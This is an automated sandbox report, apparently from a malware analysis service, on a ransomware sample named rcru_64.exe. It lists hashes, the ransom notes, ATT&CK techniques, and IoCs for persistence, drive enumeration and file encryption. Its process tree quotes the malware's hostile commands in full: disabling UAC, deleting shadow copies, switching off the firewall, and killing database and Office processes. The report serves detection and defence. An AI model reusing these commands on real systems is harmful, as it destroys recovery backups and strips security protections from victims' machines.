94c8cf0e19aa11a48a57baf54cc3679dda1dac4ad59ece1bf86ef117a974ddf9

Analysis

max time kernel
150s
max time network
148s
platform
windows7_x64
resource
win7v20201028
submitted
01/04/2021, 09:52

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

rcru_64.exe
Size

1.0MB
MD5

0d5d7377432ee449f30626c2371a0080
SHA1

56a1d1203d62c131b70837d75af79aa19a3b0487
SHA256

94c8cf0e19aa11a48a57baf54cc3679dda1dac4ad59ece1bf86ef117a974ddf9
SHA512

19980615dbcba8ca8151aa5b93bc614b79edd1d77abbe37293001ecf16991cc939afca1cf62cac90c05510174cb8b7521a3074fbc160b47fd53d374521e06f0a

Score

10^/10

evasion persistence ransomware spyware stealer trojan

Malware Config

Extracted

Path

\??\c:\Read_Me!_.txt

Ransom Note

Your Data Locked. To Get Decryption Instructions Email Us ,Don't Edit Files Or Folders ! ID : rfeHv0 Email Address :[email protected]

Emails

[email protected]

Extracted

Path

C:\Users\Admin\Desktop\ReadMe_Now!.hta

Ransom Note

All Your Files Have Been Encrypted ! All Your Files Encrypted Due To A Security Problem With Your PC. If You Need Your Files Please Send Us E-mail To Get Decryption Tools .The Only Way Of Recovering Files Is To Purchase For Decryption Tools ( Payment Must Be Made With Bitcoin ) . If You Do Not E-mail Us After 48 Hours Decryption Fee Will Double.Our E-mail Address : [email protected] Personal ID : rfeHv0Sent E-mail Should Be Contains Your Personal ID.If Don't Get a Response Or Any Other Problem Write Us E-mail At : [email protected] Check Your Spam Folder Too. What Guarantee Do We Give You ? You Can Send Some Files For Decryption Test( Before Paying ). File Size Must Be Less Than 2MB And Files Should Not Contains Valuabe Data Like (Backups , Databases etc ... ) . Get Buy Bitcoin Instructions At LocalBitcoins : https://localbitcoins.com/guides/how-to-buy-bitcoins Buy Bitcoin Instructions At Coindesk And Other Websites By Searching At Google :http://www.coindesk.com/information/how-can-i-buy-bitcoins/ Attention !! Do Not Edit Or Rename Encrypted Files. Do Not Try To Decrypt Files By Third-Party Or Data Recovery Softwares It May Damage Files Forever. In Case Of Trying To Decrypt Files With Third-Party,Recovery Sofwares This May Make The Decryption Harder So Prices Will Be Rise.

Emails

[email protected]

Signatures

UAC bypass 3 TTPs
evasion trojan

Bypass User Account Control
T1088

Disabling Security Tools
T1089

Modify Registry
T1112
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

Modifies extensions of user files 3 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

description	ioc	Process
File opened for modification	\??\c:\Users\Admin\Pictures\SendRedo.tiff	rcru_64.exe
File opened for modification	\??\c:\Users\Admin\Pictures\StepPush.tiff	rcru_64.exe
File opened for modification	\??\c:\Users\Admin\Pictures\UnpublishUnregister.tiff	rcru_64.exe

Drops startup file 4 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Desktopini.exe	rcru_64.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Desktopini.exe	rcru_64.exe
File created	\??\c:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Read_Me!_.txt	rcru_64.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Read-Me.hta	rcru_64.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Machin_Updaters = "c:\\$Recycle.Bin\\RCRU_64.exe"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Windows\CurrentVersion\Run\Machin_Update = "c:\\$Recycle.Bin\\RCRU_64.exe"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run	reg.exe

Drops desktop.ini file(s) 19 IoCs

description	ioc	Process
File opened for modification	\??\c:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini	rcru_64.exe
File opened for modification	\??\c:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini	rcru_64.exe
File opened for modification	\??\c:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Desktop.ini	rcru_64.exe
File opened for modification	\??\c:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\Desktop.ini	rcru_64.exe
File opened for modification	\??\c:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Desktop.ini	rcru_64.exe
File opened for modification	\??\c:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Desktop.ini	rcru_64.exe
File opened for modification	\??\c:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Desktop.ini	rcru_64.exe
File opened for modification	\??\c:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Tablet PC\Desktop.ini	rcru_64.exe
File opened for modification	\??\c:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\Desktop.ini	rcru_64.exe
File opened for modification	\??\c:\Program Files (x86)\Common Files\microsoft shared\Stationery\Desktop.ini	rcru_64.exe
File opened for modification	\??\c:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Stationery\Desktop.ini	rcru_64.exe
File opened for modification	\??\c:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini	rcru_64.exe
File opened for modification	\??\c:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini	rcru_64.exe
File opened for modification	\??\c:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Desktop.ini	rcru_64.exe
File opened for modification	\??\c:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini	rcru_64.exe
File opened for modification	\??\c:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini	rcru_64.exe
File opened for modification	\??\c:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Desktop.ini	rcru_64.exe
File opened for modification	\??\c:\Program Files\Common Files\Microsoft Shared\Stationery\Desktop.ini	rcru_64.exe
File opened for modification	\??\c:\Program Files (x86)\Microsoft Office\Office14\1033\DataServices\DESKTOP.INI	rcru_64.exe

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\o:	rcru_64.exe
File opened (read-only)	\??\f:	rcru_64.exe
File opened (read-only)	\??\b:	rcru_64.exe
File opened (read-only)	\??\j:	rcru_64.exe
File opened (read-only)	\??\i:	rcru_64.exe
File opened (read-only)	\??\n:	rcru_64.exe
File opened (read-only)	\??\p:	rcru_64.exe
File opened (read-only)	\??\z:	rcru_64.exe
File opened (read-only)	\??\s:	rcru_64.exe
File opened (read-only)	\??\w:	rcru_64.exe
File opened (read-only)	\??\m:	rcru_64.exe
File opened (read-only)	\??\a:	rcru_64.exe
File opened (read-only)	\??\k:	rcru_64.exe
File opened (read-only)	\??\x:	rcru_64.exe
File opened (read-only)	\??\q:	rcru_64.exe
File opened (read-only)	\??\u:	rcru_64.exe
File opened (read-only)	\??\y:	rcru_64.exe
File opened (read-only)	\??\e:	rcru_64.exe
File opened (read-only)	\??\g:	rcru_64.exe
File opened (read-only)	\??\h:	rcru_64.exe
File opened (read-only)	\??\l:	rcru_64.exe
File opened (read-only)	\??\r:	rcru_64.exe
File opened (read-only)	\??\t:	rcru_64.exe
File opened (read-only)	\??\v:	rcru_64.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	\??\c:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Niue	rcru_64.exe
File opened for modification	\??\c:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\main.html	rcru_64.exe
File opened for modification	\??\c:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14793_.GIF	rcru_64.exe
File opened for modification	\??\c:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\WANS.NET.XML	rcru_64.exe
File opened for modification	\??\c:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\COUPON.POC	rcru_64.exe
File opened for modification	\??\c:\Program Files\Java\jdk1.7.0_80\jre\lib\calendars.properties	rcru_64.exe
File opened for modification	\??\c:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.metadataprovider.exsd	rcru_64.exe
File opened for modification	\??\c:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Country.css	rcru_64.exe
File opened for modification	\??\c:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\TN01308_.WMF	rcru_64.exe
File opened for modification	\??\c:\Program Files (x86)\Microsoft Office\CLIPART\Publisher\Backgrounds\WB00516L.GIF	rcru_64.exe
File opened for modification	\??\c:\Program Files\Google\Chrome\Application\86.0.4240.111\Locales\ms.pak	rcru_64.exe
File opened for modification	\??\c:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\System.Web.Extensions.Design.dll	rcru_64.exe
File opened for modification	\??\c:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BS00200_.WMF	rcru_64.exe
File opened for modification	\??\c:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0187847.WMF	rcru_64.exe
File opened for modification	\??\c:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0241773.WMF	rcru_64.exe
File opened for modification	\??\c:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0387604.JPG	rcru_64.exe
File opened for modification	\??\c:\Program Files (x86)\Microsoft Office\Office14\ACCDDSF.DLL	rcru_64.exe
File opened for modification	\??\c:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsViewAttachmentIcons.jpg	rcru_64.exe
File opened for modification	\??\c:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoViewer.dll.mui	rcru_64.exe
File opened for modification	\??\c:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\daisies.png	rcru_64.exe
File opened for modification	\??\c:\Program Files\7-Zip\License.txt	rcru_64.exe
File opened for modification	\??\c:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\FD01548_.WMF	rcru_64.exe
File opened for modification	\??\c:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.CO.UK.XML	rcru_64.exe
File created	\??\c:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\Read_Me!_.txt	rcru_64.exe
File opened for modification	\??\c:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\System.Xml.Linq.dll	rcru_64.exe
File opened for modification	\??\c:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_thunderstorm.png	rcru_64.exe
File opened for modification	\??\c:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\NavigationRight_ButtonGraphic.png	rcru_64.exe
File created	\??\c:\Program Files\Google\Chrome\Application\86.0.4240.111\WidevineCdm\_platform_specific\Read_Me!_.txt	rcru_64.exe
File opened for modification	\??\c:\Program Files\Java\jre7\lib\zi\Pacific\Chuuk	rcru_64.exe
File opened for modification	\??\c:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Apothecary.xml	rcru_64.exe
File opened for modification	\??\c:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\STOPICON.JPG	rcru_64.exe
File opened for modification	\??\c:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DGPICCAP.XML	rcru_64.exe
File created	\??\c:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\Read_Me!_.txt	rcru_64.exe
File created	\??\c:\Program Files\Windows Mail\en-US\Read_Me!_.txt	rcru_64.exe
File opened for modification	\??\c:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\GRID_01.MID	rcru_64.exe
File opened for modification	\??\c:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\WB01734_.GIF	rcru_64.exe
File opened for modification	\??\c:\Program Files (x86)\Microsoft Office\Office14\1033\PPINTL.REST.IDX_DLL	rcru_64.exe
File opened for modification	\??\c:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Melbourne	rcru_64.exe
File opened for modification	\??\c:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-templates_zh_CN.jar	rcru_64.exe
File opened for modification	\??\c:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AN04117_.WMF	rcru_64.exe
File opened for modification	\??\c:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsTemplates\Hiring Requisition - Customized.fdt	rcru_64.exe
File opened for modification	\??\c:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\SIGNHM.POC	rcru_64.exe
File opened for modification	\??\c:\Program Files\Common Files\System\ado\msado25.tlb	rcru_64.exe
File opened for modification	\??\c:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Baghdad	rcru_64.exe
File created	\??\c:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\Read_Me!_.txt	rcru_64.exe
File opened for modification	\??\c:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\HH01618_.WMF	rcru_64.exe
File opened for modification	\??\c:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE00898_.WMF	rcru_64.exe
File opened for modification	\??\c:\Program Files (x86)\Microsoft Office\Office14\ADDINS\BCSAddin.dll	rcru_64.exe
File opened for modification	\??\c:\Program Files\Java\jre7\lib\zi\Asia\Beirut	rcru_64.exe
File opened for modification	\??\c:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD01039_.WMF	rcru_64.exe
File opened for modification	\??\c:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD10263_.GIF	rcru_64.exe
File opened for modification	\??\c:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_right_pressed.png	rcru_64.exe
File opened for modification	\??\c:\Program Files\7-Zip\Lang\lv.txt	rcru_64.exe
File opened for modification	\??\c:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\mc.jar	rcru_64.exe
File opened for modification	\??\c:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormToolImages.jpg	rcru_64.exe
File opened for modification	\??\c:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\10.png	rcru_64.exe
File opened for modification	\??\c:\Program Files\Common Files\System\Ole DB\oledbjvs.inc	rcru_64.exe
File opened for modification	\??\c:\Program Files\VideoLAN\VLC\plugins\stream_filter\libcache_read_plugin.dll	rcru_64.exe
File opened for modification	\??\c:\Program Files (x86)\Microsoft Office\Office14\1033\STSLISTI.DLL	rcru_64.exe
File opened for modification	\??\c:\Program Files (x86)\Microsoft Office\Office14\EntityPicker.dll	rcru_64.exe
File opened for modification	\??\c:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\30.png	rcru_64.exe
File opened for modification	\??\c:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Desert\HEADER.GIF	rcru_64.exe
File opened for modification	\??\c:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.dll	rcru_64.exe
File opened for modification	\??\c:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Adjacency.xml	rcru_64.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Interacts with shadow copies 2 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
1972	vssadmin.exe

Kills process with taskkill 40 IoCs

evasion

pid	Process
1380	taskkill.exe
916	taskkill.exe
1996	taskkill.exe
2008	taskkill.exe
1056	taskkill.exe
664	taskkill.exe
1812	taskkill.exe
284	taskkill.exe
1196	taskkill.exe
284	taskkill.exe
304	taskkill.exe
1896	taskkill.exe
916	taskkill.exe
1188	taskkill.exe
804	taskkill.exe
1984	taskkill.exe
1772	taskkill.exe
556	taskkill.exe
1224	taskkill.exe
668	taskkill.exe
1784	taskkill.exe
1352	taskkill.exe
1784	taskkill.exe
1764	taskkill.exe
468	taskkill.exe
1692	taskkill.exe
1984	taskkill.exe
1624	taskkill.exe
1456	taskkill.exe
1224	taskkill.exe
1304	taskkill.exe
976	taskkill.exe
1612	taskkill.exe
1776	taskkill.exe
1716	taskkill.exe
1616	taskkill.exe
296	taskkill.exe
1584	taskkill.exe
1456	taskkill.exe
1584	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 2 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Modifies registry key 1 TTPs 3 IoCs

Modify Registry

T1112

pid	Process
1976	reg.exe
1188	reg.exe
896	reg.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeBackupPrivilege	1316	vssvc.exe
Token: SeRestorePrivilege	1316	vssvc.exe
Token: SeAuditPrivilege	1316	vssvc.exe
Token: SeIncreaseQuotaPrivilege	1772	WMIC.exe
Token: SeSecurityPrivilege	1772	WMIC.exe
Token: SeTakeOwnershipPrivilege	1772	WMIC.exe
Token: SeLoadDriverPrivilege	1772	WMIC.exe
Token: SeSystemProfilePrivilege	1772	WMIC.exe
Token: SeSystemtimePrivilege	1772	WMIC.exe
Token: SeProfSingleProcessPrivilege	1772	WMIC.exe
Token: SeIncBasePriorityPrivilege	1772	WMIC.exe
Token: SeCreatePagefilePrivilege	1772	WMIC.exe
Token: SeBackupPrivilege	1772	WMIC.exe
Token: SeRestorePrivilege	1772	WMIC.exe
Token: SeShutdownPrivilege	1772	WMIC.exe
Token: SeDebugPrivilege	1772	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1772	WMIC.exe
Token: SeRemoteShutdownPrivilege	1772	WMIC.exe
Token: SeUndockPrivilege	1772	WMIC.exe
Token: SeManageVolumePrivilege	1772	WMIC.exe
Token: 33	1772	WMIC.exe
Token: 34	1772	WMIC.exe
Token: 35	1772	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1772	WMIC.exe
Token: SeSecurityPrivilege	1772	WMIC.exe
Token: SeTakeOwnershipPrivilege	1772	WMIC.exe
Token: SeLoadDriverPrivilege	1772	WMIC.exe
Token: SeSystemProfilePrivilege	1772	WMIC.exe
Token: SeSystemtimePrivilege	1772	WMIC.exe
Token: SeProfSingleProcessPrivilege	1772	WMIC.exe
Token: SeIncBasePriorityPrivilege	1772	WMIC.exe
Token: SeCreatePagefilePrivilege	1772	WMIC.exe
Token: SeBackupPrivilege	1772	WMIC.exe
Token: SeRestorePrivilege	1772	WMIC.exe
Token: SeShutdownPrivilege	1772	WMIC.exe
Token: SeDebugPrivilege	1772	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1772	WMIC.exe
Token: SeRemoteShutdownPrivilege	1772	WMIC.exe
Token: SeUndockPrivilege	1772	WMIC.exe
Token: SeManageVolumePrivilege	1772	WMIC.exe
Token: 33	1772	WMIC.exe
Token: 34	1772	WMIC.exe
Token: 35	1772	WMIC.exe
Token: SeDebugPrivilege	1224	taskkill.exe
Token: SeDebugPrivilege	1984	taskkill.exe
Token: SeDebugPrivilege	1784	taskkill.exe
Token: SeDebugPrivilege	1584	taskkill.exe
Token: SeDebugPrivilege	1352	taskkill.exe
Token: SeDebugPrivilege	976	taskkill.exe
Token: SeDebugPrivilege	1764	taskkill.exe
Token: SeDebugPrivilege	1812	taskkill.exe
Token: SeDebugPrivilege	304	taskkill.exe
Token: SeDebugPrivilege	1624	taskkill.exe
Token: SeDebugPrivilege	2008	taskkill.exe
Token: SeDebugPrivilege	1896	taskkill.exe
Token: SeDebugPrivilege	1612	taskkill.exe
Token: SeDebugPrivilege	1456	taskkill.exe
Token: SeDebugPrivilege	1056	taskkill.exe
Token: SeDebugPrivilege	284	taskkill.exe
Token: SeDebugPrivilege	916	taskkill.exe
Token: SeDebugPrivilege	1188	taskkill.exe
Token: SeDebugPrivilege	1996	taskkill.exe
Token: SeDebugPrivilege	1776	taskkill.exe
Token: SeDebugPrivilege	1716	taskkill.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1152 wrote to memory of 2032	1152	rcru_64.exe	27
PID 1152 wrote to memory of 2032	1152	rcru_64.exe	27
PID 1152 wrote to memory of 2032	1152	rcru_64.exe	27
PID 1152 wrote to memory of 2032	1152	rcru_64.exe	27
PID 2032 wrote to memory of 1976	2032	cmd.exe	28
PID 2032 wrote to memory of 1976	2032	cmd.exe	28
PID 2032 wrote to memory of 1976	2032	cmd.exe	28
PID 2032 wrote to memory of 1976	2032	cmd.exe	28
PID 2032 wrote to memory of 1972	2032	cmd.exe	29
PID 2032 wrote to memory of 1972	2032	cmd.exe	29
PID 2032 wrote to memory of 1972	2032	cmd.exe	29
PID 2032 wrote to memory of 1972	2032	cmd.exe	29
PID 2032 wrote to memory of 1772	2032	cmd.exe	31
PID 2032 wrote to memory of 1772	2032	cmd.exe	31
PID 2032 wrote to memory of 1772	2032	cmd.exe	31
PID 2032 wrote to memory of 1772	2032	cmd.exe	31
PID 2032 wrote to memory of 1764	2032	cmd.exe	36
PID 2032 wrote to memory of 1764	2032	cmd.exe	36
PID 2032 wrote to memory of 1764	2032	cmd.exe	36
PID 2032 wrote to memory of 1764	2032	cmd.exe	36
PID 2032 wrote to memory of 916	2032	cmd.exe	37
PID 2032 wrote to memory of 916	2032	cmd.exe	37
PID 2032 wrote to memory of 916	2032	cmd.exe	37
PID 2032 wrote to memory of 916	2032	cmd.exe	37
PID 2032 wrote to memory of 544	2032	cmd.exe	38
PID 2032 wrote to memory of 544	2032	cmd.exe	38
PID 2032 wrote to memory of 544	2032	cmd.exe	38
PID 2032 wrote to memory of 544	2032	cmd.exe	38
PID 1152 wrote to memory of 1108	1152	rcru_64.exe	39
PID 1152 wrote to memory of 1108	1152	rcru_64.exe	39
PID 1152 wrote to memory of 1108	1152	rcru_64.exe	39
PID 1152 wrote to memory of 1108	1152	rcru_64.exe	39
PID 1108 wrote to memory of 1224	1108	cmd.exe	40
PID 1108 wrote to memory of 1224	1108	cmd.exe	40
PID 1108 wrote to memory of 1224	1108	cmd.exe	40
PID 1108 wrote to memory of 1224	1108	cmd.exe	40
PID 1108 wrote to memory of 1984	1108	cmd.exe	42
PID 1108 wrote to memory of 1984	1108	cmd.exe	42
PID 1108 wrote to memory of 1984	1108	cmd.exe	42
PID 1108 wrote to memory of 1984	1108	cmd.exe	42
PID 1108 wrote to memory of 1784	1108	cmd.exe	43
PID 1108 wrote to memory of 1784	1108	cmd.exe	43
PID 1108 wrote to memory of 1784	1108	cmd.exe	43
PID 1108 wrote to memory of 1784	1108	cmd.exe	43
PID 1108 wrote to memory of 1584	1108	cmd.exe	44
PID 1108 wrote to memory of 1584	1108	cmd.exe	44
PID 1108 wrote to memory of 1584	1108	cmd.exe	44
PID 1108 wrote to memory of 1584	1108	cmd.exe	44
PID 1108 wrote to memory of 1352	1108	cmd.exe	45
PID 1108 wrote to memory of 1352	1108	cmd.exe	45
PID 1108 wrote to memory of 1352	1108	cmd.exe	45
PID 1108 wrote to memory of 1352	1108	cmd.exe	45
PID 1108 wrote to memory of 976	1108	cmd.exe	46
PID 1108 wrote to memory of 976	1108	cmd.exe	46
PID 1108 wrote to memory of 976	1108	cmd.exe	46
PID 1108 wrote to memory of 976	1108	cmd.exe	46
PID 1108 wrote to memory of 1764	1108	cmd.exe	47
PID 1108 wrote to memory of 1764	1108	cmd.exe	47
PID 1108 wrote to memory of 1764	1108	cmd.exe	47
PID 1108 wrote to memory of 1764	1108	cmd.exe	47
PID 1108 wrote to memory of 1812	1108	cmd.exe	48
PID 1108 wrote to memory of 1812	1108	cmd.exe	48
PID 1108 wrote to memory of 1812	1108	cmd.exe	48
PID 1108 wrote to memory of 1812	1108	cmd.exe	48

C:\Users\Admin\AppData\Local\Temp\rcru_64.exe
"C:\Users\Admin\AppData\Local\Temp\rcru_64.exe"
1⤵
- Modifies extensions of user files
- Drops startup file
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:1152
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic shadowcopy delete&netsh advfirewall set currentprofile state off&netsh firewall set opmode mode=disable&netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2032
- - C:\Windows\SysWOW64\reg.exe
    reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
    3⤵
    - Modifies registry key
    PID:1976
- - C:\Windows\SysWOW64\vssadmin.exe
    vssadmin.exe Delete Shadows /All /Quiet
    3⤵
    - Interacts with shadow copies
    PID:1972
- - C:\Windows\SysWOW64\Wbem\WMIC.exe
    wmic shadowcopy delete
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1772
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall set currentprofile state off
    3⤵
    PID:1764
- - C:\Windows\SysWOW64\netsh.exe
    netsh firewall set opmode mode=disable
    3⤵
    PID:916
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes
    3⤵
    PID:544
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /im notepad.exe&taskkill /im msftesql.exe&taskkill /im sqlagent.exe&taskkill /im sqlbrowser.exe&taskkill /im sqlservr.exe&taskkill /im sqlwriter.exe&taskkill /im oracle.exe&taskkill /im ocssd.exe&taskkill /im dbsnmp.exe&taskkill /im synctime.exe&taskkill /im agntsvc.exe&taskkill /im mydesktopqos.exe&taskkill /im isqlplussvc.exe&taskkill /im xfssvccon.exe&taskkill /im mydesktopservice.exe&taskkill /im ocautoupds.exe&taskkill /im agntsvc.exe&taskkill /im encsvc.exe&taskkill /im firefoxconfig.exe&taskkill /im tbirdconfig.exe&taskkill /im ocomm.exe&taskkill /im mysqld.exe&taskkill /im mysqld-nt.exe&taskkill /im mysqld-opt.exe&taskkill /im dbeng50.exe&taskkill /im sqbcoreservice.exe&taskkill /im excel.exe&taskkill /im infopath.exe&taskkill /im msaccess.exe&taskkill /im mspub.exe&taskkill /im onenote.exe&taskkill /im outlook.exe&taskkill /im powerpnt.exe&taskkill /im steam.exe&taskkill /im thebat.exe&taskkill /im thebat64.exe&taskkill /im thunderbird.exe&taskkill /im visio.exe&taskkill /im winword.exe&taskkill /im wordpad.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1108
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im notepad.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1224
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im msftesql.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1984
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im sqlagent.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1784
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im sqlbrowser.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1584
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im sqlservr.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1352
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im sqlwriter.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:976
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im oracle.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1764
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im ocssd.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1812
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im dbsnmp.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:304
